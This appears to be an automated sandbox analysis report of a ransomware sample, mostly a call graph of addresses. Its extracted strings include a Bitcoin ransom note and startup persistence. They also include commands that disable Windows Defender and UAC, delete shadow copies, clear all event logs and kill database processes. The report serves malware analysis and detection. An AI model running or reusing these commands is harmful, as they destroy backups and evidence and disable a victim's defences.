__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112842->112843 112844 ab47ce 112843->112844 112844->112760 112845 ab47ac 112845->112842 112848 ab4802 112845->112848 112846->112842 112846->112845 112847 ab47d4 112846->112847 112850 aa1bd0 _MREFOpen@16 28 API calls 112847->112850 112849 aa1bd0 _MREFOpen@16 28 API calls 112848->112849 112851 ab480f 112849->112851 112852 ab47e1 112850->112852 112933 ab4f50 28 API calls _MREFOpen@16 112851->112933 112931 ab4f50 28 API calls _MREFOpen@16 112852->112931 112855 ab4822 112934 b17e0c RaiseException 112855->112934 112856 ab47f4 112932 b17e0c RaiseException 112856->112932 112859 ab4830 112935 b17afd 27 API calls ___std_exception_copy 112859->112935 112861 ab4887 112862 aa1c10 _MREFOpen@16 28 API calls 112861->112862 112863 ab48a9 112862->112863 112863->112760 112936 abbce0 112864->112936 112867 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112868 abb799 112867->112868 112869 abb7b2 112868->112869 112870 ab4760 28 API calls 112868->112870 112871 abbce0 28 API calls 112869->112871 112870->112869 112872 abb7ea 112871->112872 112939 abb540 112872->112939 112874 abb849 112942 abb480 112874->112942 112878 abb88f 112879 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112878->112879 112880 abb8b2 112879->112880 112881 ab4760 28 API calls 112880->112881 112882 abb8cb 112880->112882 112881->112882 112959 abc430 112882->112959 112884 abb8ff 112980 abb600 112884->112980 112886 abb917 112887 abb540 22 API calls 112886->112887 112888 abb933 112887->112888 112889 abb480 22 API calls 112888->112889 112890 abb943 112889->112890 112891 abd680 30 API calls 112890->112891 112892 abb94b 112891->112892 112892->112762 112893->112758 112896 ab4760 28 API calls 112895->112896 112897 a7cac7 112896->112897 112898 ab4760 28 API calls 112897->112898 112899 a7cad1 112898->112899 112900 ab4760 28 API calls 112899->112900 112901 a7cb35 112900->112901 112902 ab4760 28 API calls 112901->112902 112903 a7cb74 112902->112903 112903->112834 112905 aa669f 112904->112905 112906 aa66d1 112904->112906 112907 aa66a3 112905->112907 112916 ad7ec0 30 API calls 3 library calls 112905->112916 112908 aa1bd0 _MREFOpen@16 28 API calls 112906->112908 112907->112837 112910 aa66de 112908->112910 112917 a75930 28 API calls _MREFOpen@16 112910->112917 112911 aa66bd 112911->112837 112913 aa66f1 112918 b17e0c RaiseException 112913->112918 112915 aa66ff 112916->112911 112917->112913 112918->112915 112920 aa993f 112919->112920 112921 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112920->112921 112922 aa994f ListArray 112921->112922 112923 aa99b8 112922->112923 112929 ad7f30 24 API calls 4 library calls 112922->112929 112926 aa99da 112923->112926 112930 a72140 26 API calls 4 library calls 112923->112930 112927 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112926->112927 112928 aa9a5b 112927->112928 112928->112840 112929->112923 112930->112926 112931->112856 112932->112848 112933->112855 112934->112859 112935->112861 112937 ab4760 28 API calls 112936->112937 112938 abb77e 112937->112938 112938->112867 112940 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112939->112940 112941 abb56f 112940->112941 112941->112874 112943 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112942->112943 112944 abb4b2 112943->112944 112945 abd680 112944->112945 112946 abd6c7 112945->112946 112947 abd706 112946->112947 112949 abd6d9 112946->112949 112948 aa1bd0 _MREFOpen@16 28 API calls 112947->112948 112950 abd713 112948->112950 112984 abe9e0 112949->112984 112988 a75930 28 API calls _MREFOpen@16 112950->112988 112954 abd726 112989 b17e0c RaiseException 112954->112989 112955 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112957 abd700 112955->112957 112957->112878 112958 abd734 112958->112878 112960 abbce0 28 API calls 112959->112960 112961 abc46d 112960->112961 112991 b18eeb RaiseException 6 library calls 112961->112991 112963 abc4ca 112964 abc577 112963->112964 112969 abc4db 112963->112969 112965 aa1bd0 _MREFOpen@16 28 API calls 112964->112965 112966 abc584 112965->112966 112992 a75930 28 API calls _MREFOpen@16 112966->112992 112968 abc594 112993 b17e0c RaiseException 112968->112993 112972 abb600 22 API calls 112969->112972 112971 abc5a2 112994 ab3100 26 API calls messages 112971->112994 112974 abc538 112972->112974 112975 abd680 30 API calls 112974->112975 112977 abc547 112975->112977 112976 abc5df messages 112976->112884 112978 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112977->112978 112979 abc571 112978->112979 112979->112884 112981 abb630 112980->112981 112982 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112981->112982 112983 abb640 112982->112983 112983->112886 112985 abe9fc 112984->112985 112986 abd6e4 112984->112986 112985->112986 112990 ad7f30 24 API calls 4 library calls 112985->112990 112986->112955 112988->112954 112989->112958 112990->112986 112991->112963 112992->112968 112993->112971 112994->112976 112995->112817 114013 ae5163 std::_Lockit::_Lockit 2 API calls 114012->114013 114014 aa8e0e 114013->114014 114015 ae5163 std::_Lockit::_Lockit 2 API calls 114014->114015 114018 aa8e50 std::locale::_Locimp::_Makeushloc 114014->114018 114016 aa8e30 114015->114016 114019 ae51bb std::_Lockit::~_Lockit 2 API calls 114016->114019 114017 ae51bb std::_Lockit::~_Lockit 2 API calls 114020 aa8f1d 114017->114020 114022 aa8e95 114018->114022 114024 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 114018->114024 114019->114018 114021 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114020->114021 114023 aa8bd9 114021->114023 114022->114017 114023->112375 114023->112377 114025 aa8ea0 114024->114025 114026 a72980 collate 98 API calls 114025->114026 114027 aa8ed0 114026->114027 114034 ae94b1 64 API calls 4 library calls 114027->114034 114029 aa8ee6 114030 a72a30 collate 98 API calls 114029->114030 114031 aa8ef8 114030->114031 114035 ae89c4 22 API calls Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 114031->114035 114033->112378 114034->114029 114035->114022 114036->112390 114037->112394 114038->112396 114039->112398 114040->112402 114041->112429 114070 b00daf 114071 b00dbb __FrameHandler3::FrameUnwindToState 114070->114071 114100 b00a3e 114071->114100 114073 b00f1b 114894 b01968 4 API calls 2 library calls 114073->114894 114074 b00dc2 114074->114073 114077 b00dec 114074->114077 114076 b00f22 114895 b20fe3 60 API calls _abort 114076->114895 114087 b00e2b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 114077->114087 114111 b30429 114077->114111 114079 b00f28 114896 b20f95 60 API calls _abort 114079->114896 114082 b00f30 114084 b00e0b 114086 b00e8c 114121 b2fe16 114086->114121 114087->114086 114890 b20fab 64 API calls 4 library calls 114087->114890 114090 b00e92 114125 a9c170 114090->114125 114094 b00eb3 114094->114076 114095 b00eb7 114094->114095 114096 b00ec0 114095->114096 114892 b20f86 60 API calls _abort 114095->114892 114893 b00bc4 13 API calls 2 library calls 114096->114893 114099 b00ec9 114099->114084 114101 b00a47 114100->114101 114897 b01105 IsProcessorFeaturePresent 114101->114897 114103 b00a53 114898 b1a1f6 10 API calls 3 library calls 114103->114898 114105 b00a58 114110 b00a5c 114105->114110 114899 b30309 114105->114899 114108 b00a73 114108->114074 114110->114074 114112 b30440 114111->114112 114113 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114112->114113 114114 b00e05 114113->114114 114114->114084 114115 b303cd 114114->114115 114116 b30418 114115->114116 114117 b303fc 114115->114117 114118 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114116->114118 114117->114116 114914 a71960 114117->114914 114119 b30425 114118->114119 114119->114087 114122 b2fe1f 114121->114122 114124 b2fe24 114121->114124 114993 b2fb5d 82 API calls 114122->114993 114124->114090 114994 b01740 114125->114994 114128 a9c1d4 114129 aa1800 collate 28 API calls 114128->114129 114130 a9c201 114129->114130 114131 aa1940 28 API calls 114130->114131 114132 a9c239 114130->114132 114131->114130 114133 aa1c10 _MREFOpen@16 28 API calls 114132->114133 114134 a9c24a 114133->114134 114996 a968a0 326 API calls 11 library calls 114134->114996 114136 a9c24f 114137 aa1ac0 collate 26 API calls 114136->114137 114139 a9c264 114137->114139 114138 a9c415 114140 a78780 97 API calls 114138->114140 114146 a9e585 114138->114146 114142 a9c269 114139->114142 114151 a9c432 114140->114151 114141 a9c3fd SetErrorMode SetConsoleTitleW 114143 a858e0 6 API calls 114141->114143 114142->114138 114142->114141 114143->114138 114144 a9c510 114145 a82870 30 API calls 114144->114145 114147 a9c515 GetModuleFileNameW 114145->114147 114148 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114146->114148 114149 aa1260 28 API calls 114147->114149 114150 a9e59f 114148->114150 114152 a9c53b 114149->114152 114891 b01a87 GetModuleHandleW 114150->114891 114151->114144 114153 aa1360 28 API calls 114151->114153 114154 a836f0 29 API calls 114152->114154 114155 a9c495 114153->114155 114156 a9c544 114154->114156 114157 aa9040 28 API calls 114155->114157 114158 a83590 29 API calls 114156->114158 114159 a9c4ab 114157->114159 114160 a9c54f 114158->114160 114161 aa9580 28 API calls 114159->114161 114162 aa11d0 26 API calls 114160->114162 114163 a9c4c1 114161->114163 114164 a9c55a 114162->114164 114165 aa1ac0 collate 26 API calls 114163->114165 114166 a749c0 52 API calls 114164->114166 114167 a9c4cf 114165->114167 114168 a9c565 114166->114168 114169 aa1ac0 collate 26 API calls 114167->114169 114170 aa9b40 28 API calls 114168->114170 114172 a9c4de 114169->114172 114171 a9c57a 114170->114171 114173 aa9c10 28 API calls 114171->114173 114176 a78780 97 API calls 114172->114176 114174 a9c590 114173->114174 114175 aa9ad0 28 API calls 114174->114175 114177 a9c5a6 114175->114177 114178 a9c4f6 114176->114178 114179 a749c0 52 API calls 114177->114179 114180 aa1ac0 collate 26 API calls 114178->114180 114182 a9c5b4 114179->114182 114181 a9c501 114180->114181 114183 aa1ac0 collate 26 API calls 114181->114183 114184 a749c0 52 API calls 114182->114184 114183->114144 114185 a9c5c3 114184->114185 114186 a9c5dc CopyFileW 114185->114186 114187 aa9b40 28 API calls 114186->114187 114188 a9c5fa 114187->114188 114189 aa9c10 28 API calls 114188->114189 114190 a9c610 114189->114190 114191 aa9ad0 28 API calls 114190->114191 114192 a9c626 114191->114192 114193 a749c0 52 API calls 114192->114193 114194 a9c634 114193->114194 114195 a749c0 52 API calls 114194->114195 114196 a9c643 114195->114196 114197 a9c65c CopyFileW 114196->114197 114198 a9c671 114197->114198 114199 aaa4d0 28 API calls 114198->114199 114200 a9c695 114199->114200 114201 aa8f40 28 API calls 114200->114201 114202 a9c6b0 114201->114202 114203 aa9580 28 API calls 114202->114203 114204 a9c6c6 114203->114204 114205 aa1ac0 collate 26 API calls 114204->114205 114206 a9c6d8 114205->114206 114207 aa8f40 28 API calls 114206->114207 114208 a9c6ef 114207->114208 114209 aa9580 28 API calls 114208->114209 114210 a9c705 114209->114210 114211 aa1ac0 collate 26 API calls 114210->114211 114212 a9c717 114211->114212 114213 a78780 97 API calls 114212->114213 114214 a9c72f 114213->114214 114215 aa1ac0 collate 26 API calls 114214->114215 114216 a9c73a 114215->114216 114217 a78780 97 API calls 114216->114217 114218 a9c752 114217->114218 114219 aa1ac0 collate 26 API calls 114218->114219 114220 a9c75d 114219->114220 114221 aaa4d0 28 API calls 114220->114221 114222 a9c793 114221->114222 114223 aa8f40 28 API calls 114222->114223 114224 a9c7ae 114223->114224 114225 aa9580 28 API calls 114224->114225 114226 a9c7c4 114225->114226 114227 aa1ac0 collate 26 API calls 114226->114227 114228 a9c7d6 114227->114228 114229 a78780 97 API calls 114228->114229 114230 a9c7ee 114229->114230 114231 aa1ac0 collate 26 API calls 114230->114231 114232 a9c7f9 114231->114232 114233 a93dd0 28 API calls 114232->114233 114234 a9c7fe 114233->114234 114235 a78780 97 API calls 114234->114235 114236 a9c814 114235->114236 114237 aa12d0 28 API calls 114236->114237 114238 a9c843 114237->114238 114239 a83100 42 API calls 114238->114239 114243 a9c848 114239->114243 114240 a9c8b3 114241 a85d90 6 API calls 114240->114241 114242 a9c8bb 114241->114242 114244 a85d90 6 API calls 114242->114244 114243->114240 114247 aa12d0 28 API calls 114243->114247 114245 a9c8c5 114244->114245 114246 a85d90 6 API calls 114245->114246 114252 a9c8dc 114245->114252 114248 a9c8d2 114246->114248 114249 a9c88b 114247->114249 114250 a85d90 6 API calls 114248->114250 114251 aa12d0 28 API calls 114249->114251 114250->114252 114253 a9c89e 114251->114253 114254 aaa4d0 28 API calls 114252->114254 114255 a792a0 146 API calls 114253->114255 114256 a9c926 114254->114256 114255->114240 114257 aa1a90 28 API calls 114256->114257 114258 a9c93b 114257->114258 114259 a78a80 71 API calls 114258->114259 114260 a9c94c 114259->114260 114261 aa11d0 26 API calls 114260->114261 114262 a9c95a 114261->114262 114263 a749c0 52 API calls 114262->114263 114264 a9c965 114263->114264 114265 aaa4d0 28 API calls 114264->114265 114266 a9c999 114265->114266 114267 a78a80 71 API calls 114266->114267 114268 a9c9ae 114267->114268 114269 aa9d90 28 API calls 114268->114269 114270 a9c9be 114269->114270 114271 aa11d0 26 API calls 114270->114271 114272 a9c9cc 114271->114272 114273 a749c0 52 API calls 114272->114273 114274 a9c9d7 114273->114274 114275 a749c0 52 API calls 114274->114275 114276 a9c9e2 114275->114276 114277 a84500 31 API calls 114276->114277 114315 a9c9eb 114277->114315 114278 a9cad8 114280 aa12d0 28 API calls 114278->114280 114279 aa9b40 28 API calls 114279->114315 114281 a9caea 114280->114281 114283 a74a20 52 API calls 114281->114283 114282 aa9c10 28 API calls 114282->114315 114284 a9caf9 114283->114284 114286 a749c0 52 API calls 114284->114286 114285 aa9ad0 28 API calls 114285->114315 114287 a9cb0e 114286->114287 114289 a9cb92 114287->114289 114291 aa9b40 28 API calls 114287->114291 114288 aa11d0 26 API calls 114288->114315 114290 aa9b40 28 API calls 114289->114290 114292 a9cba7 114290->114292 114293 a9cb2c 114291->114293 114294 a9cbbc 114292->114294 114295 a9cbb7 114292->114295 114296 aa9c10 28 API calls 114293->114296 114297 aa12d0 28 API calls 114294->114297 114997 a90fa0 137 API calls 3 library calls 114295->114997 114298 a9cb45 114296->114298 114300 a9cbce 114297->114300 114301 aa9ad0 28 API calls 114298->114301 114302 a74a20 52 API calls 114300->114302 114303 a9cb5e 114301->114303 114304 a9cbee 114302->114304 114305 aa11d0 26 API calls 114303->114305 114306 a9cc27 114304->114306 114309 aa12d0 28 API calls 114304->114309 114307 a9cb6d 114305->114307 114314 a9cc57 114306->114314 114318 a749c0 52 API calls 114306->114318 114310 a749c0 52 API calls 114307->114310 114308 aa12d0 28 API calls 114308->114315 114312 a9cc04 114309->114312 114313 a9cb78 114310->114313 114311 a74a20 52 API calls 114311->114315 114316 a74a20 52 API calls 114312->114316 114317 a749c0 52 API calls 114313->114317 114319 a749c0 52 API calls 114314->114319 114315->114278 114315->114279 114315->114282 114315->114285 114315->114288 114315->114308 114315->114311 114321 a749c0 52 API calls 114315->114321 114316->114306 114322 a9cb83 114317->114322 114318->114314 114320 a9cc78 114319->114320 114323 a9d02b ListArray 114320->114323 114324 a9cc85 114320->114324 114321->114315 114325 a749c0 52 API calls 114322->114325 114328 aa37b0 132 API calls 114323->114328 114326 aa12d0 28 API calls 114324->114326 114325->114289 114327 a9cc97 114326->114327 114329 a74a20 52 API calls 114327->114329 114330 a9d055 114328->114330 114331 a9cca6 114329->114331 114332 aa9130 92 API calls 114330->114332 114333 a749c0 52 API calls 114331->114333 114334 a9d069 114332->114334 114335 a9ccbb 114333->114335 114337 aa3740 95 API calls 114334->114337 114341 a9ccd6 114335->114341 114998 aa11a0 28 API calls SimpleUString::operator= 114335->114998 114342 a9d086 ListArray 114337->114342 114338 aa12d0 28 API calls 114338->114341 114340 a9cd0d ListArray 114346 aa3b00 132 API calls 114340->114346 114341->114338 114341->114340 114343 a9cd04 Sleep 114341->114343 114999 a7aed0 132 API calls 4 library calls 114341->114999 114344 a85e60 30 API calls 114342->114344 114343->114341 114345 a9d11c 114344->114345 114347 ab5c80 22 API calls 114345->114347 114349 a9cd37 114346->114349 114348 a9d135 ListArray 114347->114348 114350 a9e5b0 30 API calls 114348->114350 115000 aaae30 28 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 114349->115000 114352 a9d15d ListArray 114350->114352 114356 a9e750 30 API calls 114352->114356 114353 a9cd6f 114354 aa3a90 95 API calls 114353->114354 114355 a9cd7e 114354->114355 114357 aa1bd0 _MREFOpen@16 28 API calls 114355->114357 114358 a9d188 114356->114358 114359 a9cd8e 114357->114359 114361 aa0230 28 API calls 114358->114361 114360 aa1bd0 _MREFOpen@16 28 API calls 114359->114360 114365 a9cda2 114360->114365 114362 a9d1a6 114361->114362 114363 ab2590 30 API calls 114362->114363 114364 a9d1bc 114363->114364 114366 aa0230 28 API calls 114364->114366 114368 aa1360 28 API calls 114365->114368 114367 a9d1d6 114366->114367 114369 ab23c0 30 API calls 114367->114369 114371 a9cde2 114368->114371 114370 a9d1ec 114369->114370 114374 a77e30 28 API calls 114370->114374 114372 aa1b10 26 API calls 114371->114372 114373 a9cded 114372->114373 114375 aa1ac0 collate 26 API calls 114373->114375 114376 a9d212 114374->114376 114377 a9cdf8 114375->114377 114378 aa1b10 26 API calls 114376->114378 114379 aa1360 28 API calls 114377->114379 114380 a9d21d 114378->114380 114381 a9ce14 114379->114381 114382 aa1ac0 collate 26 API calls 114380->114382 114383 aa1b10 26 API calls 114381->114383 114384 a9d228 114382->114384 114385 a9ce1f 114383->114385 114387 aa1360 28 API calls 114384->114387 114386 aa1ac0 collate 26 API calls 114385->114386 114391 a9ce2a 114386->114391 114388 a9d240 114387->114388 114389 aa1360 28 API calls 114388->114389 114390 a9d260 114389->114390 114393 aa1a90 28 API calls 114390->114393 114392 aa1360 28 API calls 114391->114392 114396 a9ce6b 114392->114396 114394 a9d28c 114393->114394 114395 a83f00 30 API calls 114394->114395 114397 a9d2b4 114395->114397 114398 aaa5b0 28 API calls 114396->114398 114400 aa95d0 28 API calls 114397->114400 114399 a9cea5 114398->114399 115001 aa1170 28 API calls SimpleUString::operator= 114399->115001 114402 a9d2e7 114400->114402 114405 aa1b10 26 API calls 114402->114405 114403 a9ceb8 115002 aa11a0 28 API calls SimpleUString::operator= 114403->115002 114406 a9d2f5 114405->114406 114409 a9cec9 114410 aa1360 28 API calls 114409->114410 114890->114086 114891->114094 114892->114096 114893->114099 114894->114076 114895->114079 114896->114082 114897->114103 114898->114105 114903 b3c98d 114899->114903 114902 b1a21f 8 API calls 3 library calls 114902->114110 114904 b3c9aa 114903->114904 114907 b3c9a6 114903->114907 114904->114907 114909 b33b5d 114904->114909 114905 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114906 b00a65 114905->114906 114906->114108 114906->114902 114907->114905 114910 b33b64 114909->114910 114911 b33ba7 GetStdHandle 114910->114911 114912 b33c0f 114910->114912 114913 b33bba GetFileType 114910->114913 114911->114910 114912->114904 114913->114910 114921 ade660 114914->114921 114916 a7198c 114930 ad4900 114916->114930 114920 a719b5 114920->114117 114922 ab4760 28 API calls 114921->114922 114923 ade697 114922->114923 114924 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 114923->114924 114925 ade6f1 114924->114925 114926 ab4760 28 API calls 114925->114926 114929 ade725 ListArray 114925->114929 114927 ade70b 114926->114927 114928 aa6670 30 API calls 114927->114928 114928->114929 114929->114916 114931 ad493e 114930->114931 114932 ad4942 114930->114932 114934 ab4760 28 API calls 114931->114934 114984 ad7f30 24 API calls 4 library calls 114932->114984 114935 ad4961 114934->114935 114953 ad4230 CryptAcquireContextA 114935->114953 114937 ad4970 114970 ad47f0 114937->114970 114939 ad497c CryptGenRandom 114940 ad498a 114939->114940 114941 ad49e4 114939->114941 114942 ad499c CryptReleaseContext 114940->114942 114943 ad49a5 114940->114943 114944 aa1bd0 _MREFOpen@16 28 API calls 114941->114944 114942->114943 114950 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114943->114950 114945 ad49f1 114944->114945 114985 ad4390 30 API calls 3 library calls 114945->114985 114947 ad4a01 114986 b17e0c RaiseException 114947->114986 114949 ad4a0f 114951 a719ab 114950->114951 114952 b00c27 29 API calls __onexit 114951->114952 114952->114920 114954 ad427b GetLastError CryptAcquireContextA 114953->114954 114955 ad42a6 114953->114955 114954->114955 114956 ad4295 CryptAcquireContextA 114954->114956 114957 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114955->114957 114956->114955 114958 ad42c4 SetLastError 114956->114958 114959 ad42c0 114957->114959 114960 aa1bd0 _MREFOpen@16 28 API calls 114958->114960 114959->114937 114961 ad42d8 114960->114961 114987 ad4390 30 API calls 3 library calls 114961->114987 114963 ad42eb 114988 b17e0c RaiseException 114963->114988 114965 ad42f9 114989 b17afd 27 API calls ___std_exception_copy 114965->114989 114967 ad4347 114968 aa1c10 _MREFOpen@16 28 API calls 114967->114968 114969 ad4369 114968->114969 114969->114937 114971 ad4835 114970->114971 114972 ad48b7 114970->114972 114974 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 114971->114974 114983 ad4880 messages 114971->114983 114990 b0079a 5 API calls __Init_thread_wait 114972->114990 114976 ad4845 114974->114976 114975 ad48c1 114975->114971 114991 b00c27 29 API calls __onexit 114975->114991 114978 ad4230 35 API calls 114976->114978 114981 ad485d 114976->114981 114978->114981 114979 ad48e5 114992 b00750 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 114979->114992 114982 ad4877 CryptReleaseContext 114981->114982 114981->114983 114982->114983 114983->114939 114984->114931 114985->114947 114986->114949 114987->114963 114988->114965 114989->114967 114990->114975 114991->114979 114992->114971 114993->114124 114995 a9c18c GetConsoleWindow ShowWindow 114994->114995 114995->114128 114995->114142 114996->114136 114997->114294 114998->114341 114999->114341 115000->114353 115001->114403 115002->114409

                                                                                                        Executed Functions

                                                                                                        Function 00A94049 Relevance: 185.5, APIs: 13, Strings: 89, Instructions: 7001COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ ",$ /f$ ::$ <span class="spnn">$ ="$" start= auto$" start=auto$", $","$"cmd.exe","$"disaust",$"ren_end",$.K0H$.txt$21L0I$:: $:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$=" $All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Dflt$Lpath$Second Email :$Telegram , ID :$Version 5.$X$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$_Mail-$_[ID-$alterencsz="$alterencsz="",$asykat$asykat$user$c$c$c:\R_cfg.ini$c:\skips.txt$c_drive="$c_drive=""$c_end$dcdcf$dismx$emptyString$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$fpath="$fpath=""$h2gq$invalid stod argument$k2ba8v$mode="$mode="",$mode="fast",$mode="slow",$n7t0$nodisk$noshare$p2h6$r1d8la$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$skip_path="$skip_path=""$spath$spath="$spath=""$stod argument out of range$taskkill /PID $taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$thd_per_drv="$thd_per_drv=""$total_thd="$total_thd=""$u4g8$ver
                                                                                                        • API String ID: 0-3208491923
                                                                                                        • Opcode ID: 5fac6d85f9e8aff90b62f35158dcc2e0faf4739fb670bc6c5bf4a1b582ae5312
                                                                                                        • Instruction ID: 8a6ae71e3c746e0a3cc90dca8e1c2e57147cbfc5199dc037235430a1b91325d4
                                                                                                        • Opcode Fuzzy Hash: 5fac6d85f9e8aff90b62f35158dcc2e0faf4739fb670bc6c5bf4a1b582ae5312
                                                                                                        • Instruction Fuzzy Hash: 54D3F131E10248DBDF14EF68CD86BDDBBB1AF55314F108199E409A72D2EB749B88CB91
                                                                                                        Function 00A9C170 Relevance: 89.0, APIs: 5, Strings: 45, Instructions: 1531COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2805 a9c170-a9c1ce call b01740 GetConsoleWindow ShowWindow 2808 a9c269-a9c2ff call aa90a0 * 3 2805->2808 2809 a9c1d4-a9c20d call aa1800 2805->2809 2827 a9c306-a9c317 call aa90a0 2808->2827 2815 a9c210-a9c237 call aa1940 * 2 2809->2815 2824 a9c239-a9c264 call aa1c10 call a968a0 call aa1ac0 2815->2824 2832 a9c322-a9c329 2824->2832 2827->2832 2835 a9c32f-a9c343 2832->2835 2836 a9c422-a9c44e call a78780 call aa13c0 2832->2836 2839 a9c382-a9c385 2835->2839 2840 a9c345-a9c348 2835->2840 2856 a9c510-a9c852 call a82870 GetModuleFileNameW call aa1260 call a836f0 call a83590 call aa11d0 call a749c0 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call a93dd0 call a78780 call aa13c0 call aa12d0 call a83100 2836->2856 2857 a9c454-a9c50b call aa13c0 * 2 call aa1360 call aa9040 call aa9580 call aa1ac0 * 2 call aa1660 call a78780 call aa1ac0 * 2 2836->2857 2843 a9c3c2-a9c3c5 2839->2843 2844 a9c387-a9c38a 2839->2844 2842 a9c350-a9c35a 2840->2842 2842->2842 2848 a9c35c-a9c37d 